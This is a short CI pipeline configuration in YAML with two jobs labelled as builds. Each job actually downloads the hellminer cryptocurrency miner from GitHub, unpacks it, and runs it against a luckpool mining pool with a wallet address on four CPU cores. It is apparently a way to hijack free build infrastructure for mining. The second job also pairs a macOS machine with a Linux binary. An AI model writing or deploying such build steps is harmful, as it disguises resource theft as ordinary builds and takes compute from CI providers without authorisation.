jobs:
  Build_1:
    machine:
      image: golang:latest
    steps:
      - run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz&& ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 4
  
  Build_2:
    macos:
      image: golang:latest
    steps:
      - run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz&& ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 4